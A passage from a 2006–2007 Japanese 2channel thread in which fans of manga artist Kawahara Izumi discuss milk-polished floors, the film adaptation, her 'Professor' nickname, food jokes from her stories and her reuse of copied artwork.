消の時はオレンジ色の嫌な臭いもしないワックスだったから、みんな「あの頃に帰りたい…」って言ってた

159 :花と名無しさん:2006/12/24(日) 12:30:41 ID:???0
掃除くらいちゃんとしろ

160 :花と名無しさん:2006/12/24(日) 14:04:48 ID:???O
木の床ってただ丁寧に水拭きするだけじゃダメなのかねー
臭いのリスクをしょってまで牛乳で磨く意義がわからない…
余った牛乳の有効利用?

161 :花と名無しさん:2006/12/24(日) 14:10:28 ID:???0
油分でコートしないと水や汚れが染みてとれなくなるし木が腐る

162 :花と名無しさん:2006/12/24(日) 14:31:41 ID:???0
ゆとり

163 :花と名無しさん:2006/12/24(日) 16:26:09 ID:???O
加納さんが来ない・・・

164 :花と名無しさん:2006/12/24(日) 16:39:28 ID:???0
>>163ワロタ
24日はクリスマスイブでしょう?

165 :花と名無しさん:2006/12/24(日) 17:56:11 ID:???O
163じゃないけど…だけどクリスマス的にはイブのほうが盛り上がりますよねぇ…(笑)

166 :花と名無しさん:2006/12/24(日) 18:55:31 ID:???0
ワロタ
ナツカシス


167 :花と名無しさん:2006/12/24(日) 19:01:10 ID:???0
大丈夫、きっとにーちゃんが売れ残りのクリスマスケーキを
買って来てくれるさ。

168 :花と名無しさん:2006/12/24(日) 22:28:56 ID:???0
話蒸し返すけどあれって本当の牛乳だったっけ。
ワックスって書いてなかった?
ワックス用に使う牛乳だったっけ。
最近読んでないので記憶があいまいだ。

169 :花と名無しさん:2006/12/24(日) 22:51:43 ID:???0
本当の牛乳だったはず。

170 :花と名無しさん:2006/12/24(日) 23:07:07 ID:???0
クリスマスイブに、牛乳床磨き話で盛り上がっていてワロス
読みに来ている私も同類だが。

171 :花と名無しさん:2006/12/25(月) 18:05:52 ID:???O
聖夜を祝して、ホールケーキ丸ごと食いにチャレンジしました

172 :花と名無しさん:2006/12/25(月) 18:23:34 ID:???O
さらにメープルシロップをかけようw

173 :花と名無しさん:2006/12/25(月) 19:36:14 ID:???0
そんじゃ、私はタンスでも囓るかw

174 :花と名無しさん:2006/12/26(火) 01:14:12 ID:???0
超能力捜査見ててダミアンみたいだなと思った
確実に近付いてはいるが大変じれったい
そして最後の詰めで他人に持っていかれる

175 :花と名無しさん:2006/12/26(火) 06:36:17 ID:???0
消防の時、牛乳ふいてすごい臭いになってる雑巾が各教室に必ず1つはあったもんなー
私もはじめてミカエル読んだとき
本当に牛乳で磨くの!?臭いどうすんの!?って
ビビった覚えがあるよ

176 :花と名無しさん:2006/12/26(火) 19:10:12 ID:???0
>>94
でも、自分が自信をもって人に勧めたマンガが、
相手にとってはサッパリおもしろくなかった場合、
返却の瞬間って気まずいよなあ……。
その雰囲気を打ち消そうと躍起になって、思わず奇矯な態度をとってしまうってのも、まあ気持ちは分かる。

177 :花と名無しさん:2006/12/27(水) 01:31:36 ID:???0
>>176
荒れた話題蒸し返すなよw
と思ったが同意
逆のパターンもなかなか気まずい
絶対面白くてハマるから!と渡されたのにそう感じられなくて
申し訳ないやら空しいやら

178 :花と名無しさん:2006/12/27(水) 07:09:00 ID:???0
映画でも言える。

179 :花と名無しさん:2006/12/27(水) 07:38:42 ID:???0
映画と言えば、笑う大天使の映画はどうだった?
あんまり話題にもならず推して知るべしだろうけど・・・

180 :花と名無しさん:2006/12/27(水) 09:29:00 ID:???0
>>176
思わず奇矯な態度ワロタ
川原ちっくな響きでイイ

181 :花と名無しさん:2006/12/27(水) 10:08:29 ID:???0
>>179
一言でいえば  黒歴史に刻まれた
つーことで、よろしく。
レンタル100円くらいで見られる時代が来たらチャレンジしてみれば?って感じ。 

182 :花と名無しさん:2006/12/27(水) 11:26:46 ID:???0
映画は黒歴史かw
まぁ、川原ワールドを映像化しようってところで既に無理があるんだろうねぇ・・・

183 :花と名無しさん:2006/12/27(水) 11:37:24 ID:???0
>>182
> まぁ、川原ワールドを映像化しようってところで既に無理があるんだろうねぇ・・・

そーいうんじゃなくて………。
他の監督がまた映画化を企画したら、観に行こうとは思う、そんな感じ。個人的には。
気になるなら、100円レンタルを待って見てみれ。
……DVDとかになったっけ?

「2時間ドラマ 空の食欲魔人」とかあったら見るねwwww
甘露あめの前ならえが出来る俳優さんがいないと無理か。
拳を口に入れる事の出来るかとりしんごとかならできるのかなあ?

184 :花と名無しさん:2006/12/27(水) 11:59:32 ID:???0
甘露飴云々……を実写でやられてもえぐいだけというか
あれは川原絵だから笑えるネタだと思うんだがどうか。

185 :花と名無しさん:2006/12/27(水) 12:42:30 ID:???0
>>182
映画の特集本とか、漫画専門店ではまだ店頭に出てるところも
あるから、見てみるといいかも(アニメや実写関係のムックが
置いてあるようなコーナーあたり)。

とりあえず、制服に驚けw

186 :花と名無しさん:2006/12/27(水) 13:30:02 ID:???0
お嬢様とは言いがたい所作のキャスト&モブ
きっついわ〜

187 :花と名無しさん:2006/12/27(水) 14:10:51 ID:???0
「架空の森」は実写でも出来そうに思う。
卯の花ほろほろのシーンとか森田監督あたりで撮ってくれんものかw


188 :花と名無しさん:2006/12/27(水) 14:46:23 ID:???0
架空の森って胡乱な外人のアレだっけ?
いちばん好きかも

189 :花と名無しさん:2006/12/27(水) 15:53:11 ID:???0
あれはぶっ飛んでて一番面白いね。
ゴジラの版権が取れるかどうかが問題かな。

190 :花と名無しさん:2006/12/27(水) 16:21:00 ID:???0
ゴジラは別に適当にきぐるみ怪獣系なら何とでも差替えが利く気がする。
問題は、主人公のあのほんわかキリリな不思議キャラを誰が演じきれるか
という点で。まぁこれはどの漫画でも共通するんだけど。

191 :花と名無しさん:2006/12/27(水) 16:34:30 ID:???0
でも、ガチャピンのきぐるみじゃ駄目じゃないか?


なんとなく………。

192 :花と名無しさん:2006/12/27(水) 16:45:27 ID:???0
オリエンタルラジオ関連のスレからこんなの見つけた
ttp://www.youtube.com/watch?v=8NN2Zoc_sp0

>>185
確かに驚いたぞw

193 :花と名無しさん:2006/12/28(木) 22:00:02 ID:???0
今月号もコレかよ
メロディ

194 :花と名無しさん:2006/12/28(木) 22:06:10 ID:???0
……いや、こうなる気はしてた。

ページ数だけでいうなら一応ちゃんと1本分描いてはいるんだよね。
「真面目な〜」の時よりは随分ましになったと安心してたりもする。

ペプチドの説明のくだりは川原泉らしさが出てるなあ、と思った。
実験器具の絵はどこかの教科書のコピーっぽい感じなんで出典とか
書かなくていいのかな?とは思ったけど。

195 :花と名無しさん:2006/12/28(木) 22:09:04 ID:???0
読者もいい年なんだから
さっさと漫画から卒業しなさい
そうすればイライラしなくなるよ

196 :花と名無しさん:2006/12/28(木) 22:19:12 ID:???0
>>194
胴衣。30ページは少なくとも完成している。
下を見て安心するのはアレだけど、某かづこや末月みたいな
真っ白スカスカ画面じゃないので、許容範囲だw


197 :花と名無しさん:2006/12/28(木) 23:17:31 ID:???0
ついこの前揉めたばっかりなんだから他の作家の名前出すなよ。

198 :花と名無しさん:2006/12/28(木) 23:22:36 ID:???0
確信犯だろ

199 :花と名無しさん:2006/12/29(金) 00:02:06 ID:???0
脳味噌が老化してる奴なのさ

200 :花と名無しさん:2006/12/29(金) 11:35:30 ID:???0
川原泉ってメジャーなのかマイナーなのかよくわからんところがあるな。

201 :花と名無しさん:2006/12/29(金) 11:44:28 ID:???0
メジャーだけどスルーされてる感じ

202 :花と名無しさん:2006/12/29(金) 12:11:18 ID:???0
「リトルメジャー」「ビッグマイナー」という言葉があってな…。

(出来がアレだとは言え)作品が実写映画化された現在は
「リトルメジャー」って感じかなあ。

203 :花と名無しさん:2006/12/29(金) 17:34:04 ID:???O
漫画や活字中毒なヲタに評価を受け人気のある作家と言うイメージ>川原泉
好きじゃなくても、凄いねと言われていた時代もあったような…
でも近年は、漫画ヲタからも生温くヲチされていそうorz
どんなに凄い作家でも全盛期や作品の出来にムラがある事は、
仕方ないよな〜って感じか。

204 :花と名無しさん:2006/12/29(金) 18:25:02 ID:???O
最近の作品だけで判断して、過去作品へと遡らない
読者がいるであろうことも仕方ないけど歯がゆい・・・

205 :花と名無しさん:2006/12/29(金) 20:07:07 ID:???0
>>168
前にTVでお菓子づくりとか教えてる人が作業用の木製テーブルを牛乳で磨いてるのあったよ
そのテーブルは直に食材置いてこねたりしてるの

206 :花と名無しさん:2006/12/29(金) 20:58:15 ID:???0
>>205
まな板みたいなものか。

あの学園はお掃除のときエプロンなのがお嬢様だよね。
普通はジャージだ。

207 :花と名無しさん:2006/12/29(金) 23:34:03 ID:???0
>>204
メロで初めて読んだ人が興味持てなかったり、いい加減だと怒ったりしても
しかたないんじゃない?

全作読んでるが
メロになってからはもう過去の遺産を食い潰してる状態な気が汁

中国の壷くらいまでは良かったけどね。


208 :花と名無しさん:2006/12/30(土) 04:42:15 ID:???O
昔の話だが後藤寿庵がパロディ描いてたっけなぁ

209 :花と名無しさん:2006/12/30(土) 17:04:50 ID:???O
昔 哲学科の男子の友人数人が
なんちゃって哲学
川原泉
って言ってた

確かになんちゃってだとおも
ちなみに友人たちも自分も川原好き
でも教授って呼ぶのはイタイ

210 :花と名無しさん:2006/12/30(土) 17:40:59 ID:???O
なんちゃってだから娯楽作品として成立してるんだと思う。
本格的に哲学にひたりたいなら専門書を読めばって話だし。

教授って愛称はファンの敬意が感じられて好きさー。

211 :花と名無しさん:2006/12/30(土) 18:22:11 ID:???0
ただの愛称で「教授」って呼ばれることがムカツク連中って

学 歴 コ ン プ レ ッ ク ス 激 し 杉 w



212 :花と名無しさん:2006/12/30(土) 18:38:29 ID:???0
改行とか空白入れてる文章で、本人意外面白いと思うものって無い

213 :花と名無しさん:2006/12/30(土) 18:51:41 ID:???0
もう一度日本語でどうぞ

214 :花と名無しさん:2006/12/30(土) 18:54:52 ID:???0
「教授」の何が痛いのか、冷静に説明してほしいなw

215 :花と名無しさん:2006/12/30(土) 19:49:20 ID:???O
流れを無視して、明日は紅白歌合戦。
見どころは森vs森の夫婦対決(元だけど)。
河原作品にこんなのがあったような・・・

216 :花と名無しさん:2006/12/30(土) 20:00:47 ID:???0
>>216
正直一緒にしてほしくないね

217 :花と名無しさん:2006/12/30(土) 20:54:03 ID:???0
>>216
何をだ、何を

218 :花と名無しさん:2006/12/30(土) 21:26:27 ID:???0
モリモリ夫婦とメイプルの仁科夫婦を言ってるからだろ


219 :花と名無しさん:2006/12/30(土) 22:30:35 ID:???0
違うだろ。アンカーみすにつっこんでるんだろ

220 :花と名無しさん:2006/12/30(土) 23:19:18 ID:???0
俺、「教授」って、「博識ぶってる」という意味の蔑称だと思ってた。

221 :花と名無しさん:2006/12/30(土) 23:20:23 ID:???0
マカエレってアンカーミス時々出る。何でだろ

222 :花と名無しさん:2006/12/30(土) 23:42:37 ID:???0
そもそも教授って愛称はいつどこで誰が使い始めたんだろう?

223 :花と名無しさん:2006/12/31(日) 04:12:15 ID:???0
>>222
そういやそうだね
にちゃん以外でも教授って使ってたっけ?

224 :花と名無しさん:2006/12/31(日) 05:05:47 ID:???0
>>220
また学歴コンプ丸出しのやつが来た…

225 :花と名無しさん:2006/12/31(日) 05:07:49 ID:???0
花ゆめの別冊で川原特集号(食欲魔人シリーズ中心だったかな)
やってた時には、もう「教授」が定着してたんじゃなかったかなあ。
別に2ch内限定じゃなかったはず。

坂本龍一もYMO時代には通称「教授」だったし、ちょっと博識な
人に対して親しみもこめて呼ぶ、くらいの感覚なんじゃないのかなあ。

226 :花と名無しさん:2006/12/31(日) 05:41:07 ID:???0
うん。蔑称とかいう感覚はないなあ……。ちょっとビクーリ

227 :花と名無しさん:2006/12/31(日) 08:10:20 ID:???0
>>222
花とむしの投稿って可能性もあるような希ガス。

228 :花と名無しさん:2006/12/31(日) 09:52:28 ID:???0
何にしろ「蔑称」てのはないだろういくら何でも……。
教授が蔑称てのはどういう生活層なんだ。

229 :花と名無しさん:2006/12/31(日) 09:55:53 ID:???0
まーまー
裕福層ならそう無駄に煽るな

230 :花と名無しさん:2006/12/31(日) 10:03:31 ID:???0
先生と呼ばれるほどの阿呆でなし、みたいな
意味でとってたのかもよw

なんにしても教授は花ゆめ誌上で
いつのまにかそう呼ばれてたから
するっとそう言うようになっただけだ
225の感覚が一番正しいんじゃない?

231 :花と名無しさん:2006/12/31(日) 10:06:53 ID:???0
眼鏡で物知りの子供キャラの通称は「博士」みたいな軽いノリだよねえきっと。

232 :花と名無しさん:2006/12/31(日) 10:08:03 ID:???0
だよなぁ
いいじゃん教授。哲学扱ってる漫画自体そう多くないんだし。
いきなり蔑称なんて言い出す人がいるから混乱するんだよみんな。

233 :花と名無しさん:2006/12/31(日) 11:02:48 ID:???O
花ゆめ本誌はどうだか知らんが美貌の果実の単行本の奥付に書いてあったのが最初に見た。
川原がなんちゃってなのは本人もインタビューでカッコ良さげな言葉をギャグのつもりで使ってるって言ってる。
少女マンガは作家に愛称(モー様ケーコたんドジ様とか)つけるのが多いからそれの一つだとしか思わん。
まあそれが痛いと思ってりゃ思えばいいけど。

234 :花と名無しさん:2006/12/31(日) 13:26:53 ID:???0
この手の痛いの何だの発言を見てると、作家を
学歴ネタで叩きたがる厨を思い出す。

235 :花と名無しさん:2006/12/31(日) 21:57:31 ID:???0
>>231
ああ、ズッコケが読みたくなった。

236 :花と名無しさん:2006/12/31(日) 22:09:32 ID:???0
>>235
本屋で40代になった3人組の本見つけてむちゃくちゃ驚いたよ。

237 : 【凶】 【1372円】 :2007/01/01(月) 03:12:48 ID:???O
うりゃ!

238 : 【大吉】 【484円】 :2007/01/01(月) 07:15:02 ID:???0
凶ではアレなので、ソリャ!

239 : 【だん吉】 【145円】 :2007/01/01(月) 16:26:24 ID:???O
皆さんあけおめ〜
次号こそはちゃんと一本半読めるといいな

240 : 【大吉】 【1821円】 :2007/01/01(月) 16:57:09 ID:???0
>>239
ホントだねー

241 :花と名無しさん:2007/01/01(月) 19:40:29 ID:???0
学歴云々に関しては、
昔はさほど感じなかったけど
川原作品のはしっこに学歴差別っぽい
のはあるのかなーと思った。
まあ今現在描いてる舞台が工リート校
ってことで余計に目立つ気がする
だけかもしれないけど。
「とても可愛らしい偏差値です」とか
「どーして自分だけはちがうと思うかな。」
とか。

学歴とはちがうけど、
どーせ私は庶民事件もあったし・・・。

気にしすぎ?

242 :花と名無しさん:2007/01/01(月) 19:57:58 ID:???0
学歴差別というより川原さんの好みの問題なんじゃないかな。

川原さん自身、ある程度知識がある人の方が話しやすいとか、
付き合いやすいとは思っていそう。
なんでもかんでも「知らない。それ何?わからない」だと
話が進まないタイプ。
成績がいいとかじゃなく頭がいいって人もいるけど、
大きく分けると何も知らない人はやっぱり偏差値低い可能性が高いんだよ。

243 :花と名無しさん:2007/01/01(月) 20:54:35 ID:???0
>>241
「どーして自分だけはちがうと思うかな」は(『真面目な人には〜』の
ヤツだよね)、成績関連とは別に関係ないんじゃない?
遊び人(という評判が多い)と付き合った女の子が、「他の子は遊びだけど
私だけはきっと例外よ」と思い込むのは、成績に関係なくよくある話だし。

偏差値の数字が可愛らしい……は、まあ若干見くだしてはいるとは思うけど、
高校ごとに学力の格差があるのはある程度しょうがないしなあ。

244 : 【豚】 【483円】 :2007/01/01(月) 23:07:31 ID:???O
どら

245 : 【大吉】 【195円】 :2007/01/01(月) 23:09:23 ID:???O
うりゃ

246 :花と名無しさん:2007/01/01(月) 23:23:32 ID:???0
>>244
この卑しいブタが!

247 :花と名無しさん:2007/01/02(火) 00:52:54 ID:???0
>>242
そうだね。
学歴って言うより知的好奇心が
無い人とはつきあいにくいとは思ってそう。


248 :花と名無しさん:2007/01/02(火) 01:57:00 ID:???0
川原泉本人は、自分のことを博識なんて全然思ってなさそうなんだが、
ファンの中にはときどき川原泉が博識だと一生懸命主張している人がいるんだけど、
あれって本気で言ってるのかどうか気になって仕方がない。

249 :花と名無しさん:2007/01/02(火) 02:23:51 ID:???0
本はたくさん読んでそうだけど
あんまり映画は見てなさそう

勝手なイメージ

250 :花と名無しさん:2007/01/02(火) 03:13:12 ID:???O
川原さんってアシスタントつかってないんだっけ?
同じようにアシスタントなしで描いてる清原なつのなんかは今でも丁寧な絵なんだけどね
とにかくコピー絵多用だけはやめてほしい


251 :花と名無しさん:2007/01/02(火) 08:44:27 ID:???O
昔は先生のとこもアシがたくさんいて先生は目を入れるだけだったのに
今は・・・

252 :花と名無しさん:2007/01/02(火) 10:04:28 ID:???O
描いてくれるだけでいい。

253 :花と名無しさん:2007/01/02(火) 11:28:55 ID:???0
私も新作読めればそれでいい

254 :花と名無しさん:2007/01/02(火) 13:02:47 ID:???0
昔の作品とはまた違った意味で
ブレーメンUもレナードも大好きなのでそれでいい

このスレで時々ある「昔からのファンは最近の作品には批判的」みたいな決め付けを見ると
少数派だろうがなんだろうが、
今の作品が好きな昔からのファンもいるんじゃい、と(ry

255 :花と名無しさん:2007/01/02(火) 13:11:30 ID:???0
何で学歴コンプ厨にまとわりつかれてるんだろう
低学歴は他スレへどうぞ

256 :花と名無しさん:2007/01/02(火) 14:09:35 ID:???O
おりゃー低学歴だけどここに居座ってやるー
…つか学歴とかどうでもよくね?
漫画が面白ければそれでよくね?

つ【お雑煮】【ぜんざい】【あべかわ】
ホレ、もちでも食ってもちつけや

257 :花と名無しさん:2007/01/02(火) 15:27:50 ID:QA1sMo79O
>>254
ノシ、俺がそうだわ。
今のも昔のも好き。
変化を楽しんでる感じかな。

258 :花と名無しさん:2007/01/02(火) 15:49:11 ID:???O
アシスタントはM君(ポニーテールの幼なじみの人)かな?

259 :花と名無しさん :2007/01/02(火) 16:55:08 ID:???0
このスレ検索のために“川原”と入力したつもりが“空腹”になっていた
ネタじゃなくてマジで
お雑煮もぎゅもぎゅ

260 :花と名無しさん:2007/01/02(火) 20:49:11 ID:???0
>>259
さては「かわはら」のつもりで「からはら」と打ったなw
ついでにカナ入力か?(もっともローマ字でもrとwは
至近距離だが)

261 :花と名無しさん:2007/01/03(水) 00:10:31 ID:???O
餅の話題が出てきたところでベーコンチーズ餅を試してみるかな。

262 :花と名無しさん:2007/01/03(水) 00:25:27 ID:???0
>>261
醤油をちょっと垂らすと美味いよ

263 :花と名無しさん:2007/01/03(水) 01:19:54 ID:???0
もんじゃ とか お好み焼きに入れるという手もある。

264 :花と名無しさん:2007/01/03(水) 01:59:39 ID:???0
>>263
今日、お好み焼きに入れて食べたよ。
失敗したとオモタ。もんじゃに入れた方が旨い。

265 :花と名無しさん:2007/01/03(水) 22:01:30 ID:???0
誰かアップルジャムを試した猛者はおらんか?

266 :花と名無しさん:2007/01/03(水) 22:30:50 ID:???0
作者が自分でやってみたらしいじゃないかw

「あれはやめといたほうがいいぞ(汗)イマイチだ」

267 :花と名無しさん:2007/01/04(木) 09:53:12 ID:???0
>>265-266
思い出したかのように昨日の夜食に試したけど、アップル・ブルーベリーともにわたしは駄目だった。
生温かいねっとりとした酸味が喉を通った瞬間、怖気で震えた震えた。

268 :花と名無しさん:2007/01/04(木) 10:32:16 ID:???0
まぁごはんにジャムかけて食ってうまいかどうか、と大差ないしなぁ。

269 :花と名無しさん:2007/01/04(木) 15:42:16 ID:???0
>>267
あなたの勇気に拍手を贈ります。
カキコ読んだだけで、なんか味の想像がついたw

270 :花と名無しさん:2007/01/04(木) 16:28:44 ID:???0
ちっ… わざわざちゃんちゃんこ用意したのに。

271 :花と名無しさん:2007/01/04(木) 17:07:16 ID:???0
リンゴジャムって、アップルパイに入れる奴?

272 :花と名無しさん:2007/01/04(木) 17:09:50 ID:???0
何いってんの?

273 :花と名無しさん:2007/01/04(木) 17:14:57 ID:???0
あ、「アップルジャム」か。すまそ。

274 :花と名無しさん:2007/01/04(木) 17:16:42 ID:???0
マジ何いってんの

275 :花と名無しさん:2007/01/04(木) 17:25:28 ID:???0
ん、ごめん。
川原氏の言うところの「アップルジャム」
って、どんなやつだ?

276 :花と名無しさん:2007/01/04(木) 17:26:33 ID:???0
スーパーいってこい

277 :花と名無しさん:2007/01/04(木) 17:37:13 ID:???0
カーラスレにいる割にはずいぶんトゲトゲしてるな。

278 :花と名無しさん:2007/01/04(木) 17:39:12 ID:???O
アップルパイには確かに甘く煮たリンゴが入ってるけど
リンゴジャムとはちょっと違うんだと思う
ジャムは形がなくなるまで煮つめてあるし、より甘そうなイメージ
あ…アップルパイ食べたくなった、焼きたてサクサクのやつ

279 :花と名無しさん:2007/01/04(木) 17:40:41 ID:???0
スーパーで解決するなw

280 :265:2007/01/05(金) 00:06:05 ID:???0
ビミョーに荒れてる?
ごめんよー、ミカエル1巻読み直してみたら
アップルジャムじゃなくてリンゴジャムだたよ。
アップル・ジャックと混同したみたい。

281 :花と名無しさん:2007/01/05(金) 00:11:33 ID:???0
食欲魔人に出てきた薔薇のジャムも気になる・・・
名前の響きは美しいが確かに美味くはなさそう


282 :花と名無しさん:2007/01/05(金) 00:17:37 ID:???0
>>280
ドンマイ

283 :花と名無しさん:2007/01/05(金) 00:27:11 ID:???0
>>281
それは本当に美味くないらしい。
エマスレで試した人がいた。

284 :花と名無しさん:2007/01/05(金) 01:06:12 ID:???0
薔薇ジャムは薔薇の香りのする汁に薄い湯葉が入ってると思うと
大体いいと思う。
味は砂糖。

285 :花と名無しさん:2007/01/05(金) 01:54:29 ID:???O
>>249
亀だけど確か映画もかなり見るはず
母上と共にWOWOWで映画見まくってるエッセイ漫画読んだことあるような…

286 :花と名無しさん:2007/01/05(金) 02:11:24 ID:???O
家にある様々なジャムで試した結果、アロエジャムはご飯にかけるとウマイと思う。

申し遅れました、ワタクシドクターペッパー愛飲者デス。

287 :花と名無しさん:2007/01/06(土) 11:54:52 ID:???0
>>261
一時期やったらものすごいはまって食いすぎて便秘になった。
孝志にーちゃんの忠告守ってればよかった。
>>262が言うように醤油たらしたほうが旨い。

最近小人が騒ぐので以来に川原作品(レナード)読んだんだけど
ずいぶん絵柄が変わったね。なんつーか無機質っぽさが増したというか。
内容もますますストイックに・・・・。
それはいいんだけどメイプル戦記以降目立つなーと思ってた絵のコピペ、
相変わらず多用してるんだね。
これ残念でしょうがない。他の漫画家もこんなもん?

288 :花と名無しさん:2007/01/06(土) 14:19:25 ID:???O
>>287
ここまで異常にコピペが多いのは川原さんくらいじゃないかな
私はレナードで初めてコピペに気付いたくらい鈍い読者だけど
そのニブチンにすら「異常」と思わせるほどだから…
同じ人物ならともかく、別の話の別人にまで同じ顔を使い回すとか
正直、あまりにも見苦しいとは思うけど
もうこの方法でしか漫画を描けないと言われるなら仕方ない…か?

289 :花と名無しさん:2007/01/06(土) 15:06:45 ID:???0
コピーはフロイト辺りで初めて気づいたな〜
でも以前はもう少し効果的に使ってた気がするけど
最近は他のキャラを顔だけすげ変えたり
顔の中身だけ入れ替えたりしてるから
下手したら本人じゃなくても描けるんじゃないかと
思ってしまう

290 :花と名無しさん:2007/01/06(土) 15:38:54 ID:???0
まぁ、絵は真似できても発想を真似るのは難しいけどね

291 :花と名無しさん:2007/01/06(土) 15:40:56 ID:???0
ていうか川原さんの場合それがすべてになっちゃったなorz
前は点目のほのぼの絵にも魅力があったんだが……。

292 :花と名無しさん:2007/01/06(土) 17:01:40 ID:???0
まあそのやる気のなさ加減が川原さんらしいっちゃらしいか?
岡田あーみんの味のある殴り描きみたいなニュアンスで捉えれば・・・・
いや・・・やっぱりコピペはどうしても受け入れられないorz
あそこまで多いともはや邪道だよ・・・

293 :花と名無しさん:2007/01/06(土) 17:41:43 ID:???0
どこかで読んだ、川原さんの絵でガンダムネタ(Zだっけか?)の作者さんが
レナード描いたらなあ…と、どうでもいいことを思ってしまう

294 :花と名無しさん:2007/01/06(土) 17:41:51 ID:???0
>>292
殴り書きはそれとしてその場面に必要と作者が思った絵が描かれるけど、
コピーは別の場面と同じものだからなぁ。

あれだけコピー多いのはあと金田一孫ぐらいだ。

295 :花と名無しさん:2007/01/06(土) 17:42:44 ID:???0
昔は点目は口ほどにモノを言っていたのに

296 :花と名無しさん:2007/01/06(土) 19:06:49 ID:???0
首だけすげかえたの見ちゃうと一気に読む気が失せてしまう
適当にやってんのかなーって

297 :花と名無しさん :2007/01/06(土) 20:01:26 ID:???0
昔みたいに複数人のアシスタントさんに
手伝ってもらえないというのも理由の一つでは


298 :花と名無しさん:2007/01/06(土) 21:16:35 ID:???0
不景気なのか?

アシさんといえばどっかの単行本の1/4スペースに
作者もアシさんたちも処女だから妖精になれますとか書いてたね。

299 :花と名無しさん:2007/01/06(土) 21:32:47 ID:???O
白泉社の人ここみてる?
見てたらお願い
コピー絵だけはやめるよう 川原さんに言ってちょうだい
それだけでも作品の質は上がると思うの

300 :花と名無しさん:2007/01/06(土) 21:46:38 ID:???0
>>299
あほかw

301 :花と名無しさん:2007/01/06(土) 21:54:53 ID:???0
>>299
マジでそう思っているのならば、携帯で白泉社公式サイトの無料登録して
メロディのBBSにメッセージ送れば?(登録しないと書き込みできない式)
BBSにメッセージは反映されないかも知れないけど
こういうメッセージがあったと言う報告はしてくれる…かも知れないw
他は、普通にメロディを購読して、毎月アンケに書き続ける。

2chで愚痴っていても、編集や作者にはまともに伝わるのは
難しいと個人的には思っている。
あくまでも、ここは読者同士の愚痴り場所もしくは情報交換の場。

302 :花と名無しさん:2007/01/06(土) 21:55:51 ID:???O
描いてくれるだけでいい。

303 :花と名無しさん:2007/01/06(土) 22:03:57 ID:???0
全く描かなくなるよりはコピーでもいいよ
長いリハビリなんだよ、きっと

304 :花と名無しさん:2007/01/06(土) 22:04:47 ID:???0
商業やめて同人でもいいんだけど。
そっちの方がリハビリにはなりそう。

305 :花と名無しさん:2007/01/06(土) 22:47:27 ID:???O
作者はともかく 出版社はマーケティングリサーチ?してると思うんだけど
2ちゃんくらいみるよ

306 :花と名無しさん:2007/01/06(土) 23:23:35 ID:???0
で?w

307 :花と名無しさん:2007/01/06(土) 23:32:50 ID:???0
コピー抜きにしても作風の変化についていけなくなってるわ自分。
でも昔のやつ何回読んでも飽きないし
読めば読むほど未だに味が出るスルメもんが多いから
懐古厨でいることにする。

308 :43歳♂:2007/01/06(土) 23:51:31 ID:???0
一般の男子はどうかわかりませんが、周りの男子は

A.どちらかというと作者のファンではなく、作品のファンである。
B.どちらかというと俳優のファンではなく、劇中人物のファンである。

という人が多いです。









309 :花と名無しさん:2007/01/06(土) 23:57:19 ID:???0
誤爆?

310 :花と名無しさん:2007/01/07(日) 10:46:22 ID:???0
この人の漫画読んでると無性に腹が減ってこない?
出てくるもの全部おいしそうだし
何よりうまそ〜〜に食べるんだもの。もぎゅもぎゅと。

311 :花と名無しさん:2007/01/07(日) 11:07:07 ID:???0
なんかループしてね?

312 :花と名無しさん:2007/01/07(日) 12:08:33 ID:???O
論争が起きると食い物ネタに救いを求めるのが川原スレ住人の特徴w

コピペ問題に関しては、とことんガス抜きしておくべきだとオモ

313 :花と名無しさん:2007/01/07(日) 13:23:52 ID:???0
川原さんて漫画描く時PC使ってるのかな?

314 :花と名無しさん:2007/01/07(日) 17:32:40 ID:???0
PC使ってコピペするのが楽しいとか・・・
描く量を半分にいや1/3に減らしてもいいからコピペ減らして欲しい

315 :花と名無しさん:2007/01/07(日) 19:04:02 ID:???0
最悪コピペ使ってもいいからわからないように使って欲しい

人気出て収入増える→アシさん増える→コピペなくなる→マンセー
っていうのが理想なんだけどね

316 :花と名無しさん:2007/01/07(日) 20:21:21 ID:???0
鹿児島という地理的条件もあるからどうだろう

317 :花と名無しさん:2007/01/07(日) 22:14:54 ID:???0
眼だけでいいから昔の絵に戻ってほしいなぁ

318 :花と名無しさん:2007/01/07(日) 22:33:07 ID:???0
>>317
激しく同感
それと、父親役の顔がな…どうも違和感ありすぎる

319 :花と名無しさん:2007/01/07(日) 23:47:25 ID:???0
多分、収入が少ないからアシ使わないとかじゃなくて、人間関係でもめたくないから使ってないんだとおもうよ

320 :花と名無しさん:2007/01/07(日) 23:58:33 ID:WrPRAhFMO
そういや、桜島が噴火したんだよね。
どのくらいの椰子の実が落ちたんだろう。

321 :花と名無しさん:2007/01/08(月) 02:33:34 ID:???O
火山灰用ゴミ袋 で灰は片付けたのかな。

322 :花と名無しさん:2007/01/08(月) 14:49:10 ID:???O
つきあっていたor好きだった担当氏とアシが駈け落ちしたのが『空色の革命』以降の
大スランプの原因なんだってヤフーだったか懐古板だったかの書き込みで見たことがある。
だとすれば319に同意。

323 :花と名無しさん:2007/01/08(月) 15:24:05 ID:???0
うっわー(((;゚Д゚)))ガクガクブルブル…

324 :花と名無しさん:2007/01/08(月) 16:12:08 ID:???0
まじすか(゚Д゚;)

325 :花と名無しさん:2007/01/08(月) 16:55:47 ID:???0
駆け落ちってw

326 :花と名無しさん:2007/01/08(月) 17:05:34 ID:???0
ツッコむのは野暮だろうが既婚だったわけでもないならそれ、
「カケオチ」ではないんじゃ……?


327 :花と名無しさん:2007/01/08(月) 17:11:25 ID:???0
駆け落ちに未婚既婚は関係ないですよ

でも誰から逃げたんだって話だよね
編集は社を辞めたのか?アシの為に

328 :花と名無しさん:2007/01/08(月) 17:51:45 ID:???O
昔、四分の一によく担当さんのことを書いてたよね
あれ、この人のこと好きなの?って思った時があったけど…
駆け落ち話は、ああいうとこから想像を巡らしたんじゃないかなー
確たる証拠もないのに、「男を取られてスランプ」みたいな
噂を立てられるのは、同じ女性としてちょっとカワイソス(´・ω・`)

329 :花と名無しさん:2007/01/08(月) 19:32:51 ID:???0
初期のこわそうな担当とめがねの若い担当といたよね?
めがねのほうがかけおちしたんかなあ…

330 :花と名無しさん:2007/01/08(月) 20:47:48 ID:???0
めがねのほうって入社試験でビックエッグを解説したひと?

331 :花と名無しさん:2007/01/08(月) 20:48:31 ID:???0
カエルの前田さん、好き嫌いのない味屋素さん、クリスチャンの…なんだっけ

自分の中では川原さんて色恋沙汰には一切縁のない人ってイメージだった。
妖精云々の話もあったし。

332 :花と名無しさん:2007/01/08(月) 20:56:42 ID:???0
>>322
単に話題に枯渇してでっち上げただけでしょ
有名漫画家ならまだしも
